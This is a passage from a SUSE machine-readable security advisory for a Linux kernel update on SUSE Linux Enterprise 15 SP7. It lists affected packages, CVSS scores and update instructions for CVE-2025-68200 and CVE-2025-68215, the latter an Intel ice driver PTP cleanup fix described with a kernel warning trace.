"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: fix PTP cleanup on driver removal in error path\n\nImprove the cleanup on releasing PTP resources in error path.\nThe error case might happen either at the driver probe and PTP\nfeature initialization or on PTP restart (errors in reset handling, NVM\nupdate etc). In both cases, calls to PF PTP cleanup (ice_ptp_cleanup_pf\nfunction) and \u0027ps_lock\u0027 mutex deinitialization were missed.\nAdditionally, ptp clock was not unregistered in the latter case.\n\nKeep PTP state as \u0027uninitialized\u0027 on init to distinguish between error\nscenarios and to avoid resource release duplication at driver removal.\n\nThe consequence of missing ice_ptp_cleanup_pf call is the following call\ntrace dumped when ice_adapter object is freed (port list is not empty,\nas it is required at this stage):\n\n[ T93022] ------------[ cut here ]------------\n[ T93022] WARNING: CPU: 10 PID: 93022 at\nice/ice_adapter.c:67 ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] RIP: 0010:ice_adapter_put+0xef/0x100 [ice]\n...\n[ T93022] Call Trace:\n[ T93022] \u003cTASK\u003e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? __warn.cold+0xb0/0x10e\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] ? report_bug+0xd8/0x150\n[ T93022] ? handle_bug+0xe9/0x110\n[ T93022] ? exc_invalid_op+0x17/0x70\n[ T93022] ? asm_exc_invalid_op+0x1a/0x20\n[ T93022] ? ice_adapter_put+0xef/0x100 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n[ T93022] pci_device_remove+0x42/0xb0\n[ T93022] device_release_driver_internal+0x19f/0x200\n[ T93022] driver_detach+0x48/0x90\n[ T93022] bus_remove_driver+0x70/0xf0\n[ T93022] pci_unregister_driver+0x42/0xb0\n[ T93022] ice_module_exit+0x10/0xdb0 [ice\n33d2647ad4f6d866d41eefff1806df37c68aef0c]\n...\n[ T93022] ---[ end trace 0000000000000000 ]---\n[ T93022] ice: module unloaded",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68215",
"url": "https://www.suse.com/security/cve/CVE-2025-68215"
},
{
"category": "external",
"summary": "SUSE Bug 1255226 for CVE-2025-68215",
"url": "https://bugzilla.suse.com/1255226"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
